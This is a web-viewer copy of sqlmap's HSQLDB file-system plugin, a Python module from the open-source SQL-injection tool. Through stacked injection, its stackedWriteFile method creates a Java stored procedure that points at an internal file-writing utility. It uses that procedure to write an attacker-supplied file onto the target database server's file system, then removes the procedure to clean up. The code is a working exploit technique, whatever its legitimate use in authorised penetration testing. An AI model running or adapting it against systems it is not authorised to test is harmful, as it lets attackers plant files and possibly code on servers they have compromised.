Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
sqlmapproject
GitHub Repository: sqlmapproject/sqlmap
 Path: blob/master/plugins/dbms/hsqldb/filesystem.py
2992 views
1
#!/usr/bin/env python

2


3
"""

4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)

5
See the file 'LICENSE' for copying permission

6
"""

7


8
from lib.core.common import randomStr

9
from lib.core.data import kb

10
from lib.core.data import logger

11
from lib.core.decorators import stackedmethod

12
from lib.core.enums import PLACE

13
from lib.request import inject

14
from lib.core.exception import SqlmapUnsupportedFeatureException

15
from plugins.generic.filesystem import Filesystem as GenericFilesystem

16


17
class Filesystem(GenericFilesystem):

18
    def readFile(self, remoteFile):

19
        errMsg = "on HSQLDB it is not possible to read files"

20
        raise SqlmapUnsupportedFeatureException(errMsg)

21


22
    @stackedmethod

23
    def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):

24
        func_name = randomStr()

25
        max_bytes = 1024 * 1024

26


27
        debugMsg = "creating JLP procedure '%s'" % func_name

28
        logger.debug(debugMsg)

29


30
        addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (func_name, max_bytes)

31
        addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "

32
        addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"

33
        inject.goStacked(addFuncQuery)

34


35
        fcEncodedList = self.fileEncode(localFile, "hex", True)

36
        fcEncodedStr = fcEncodedList[0][2:]

37
        fcEncodedStrLen = len(fcEncodedStr)

38


39
        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:

40
            warnMsg = "as the injection is on a GET parameter and the file "

41
            warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen

42
            warnMsg += "bytes, this might cause errors in the file "

43
            warnMsg += "writing process"

44
            logger.warning(warnMsg)

45


46
        debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)

47
        logger.debug(debugMsg)

48


49
        # Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures

50
        invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (func_name, remoteFile, fcEncodedStr, max_bytes)

51
        inject.goStacked(invokeQuery)

52


53
        logger.debug("cleaning up the database management system")

54


55
        delQuery = "DELETE PROCEDURE %s" % func_name

56
        inject.goStacked(delQuery)

57


58
        message = "the local file '%s' has been written on the back-end DBMS" % localFile

59
        message += "file system ('%s')" % remoteFile

60
        logger.info(message)

61


62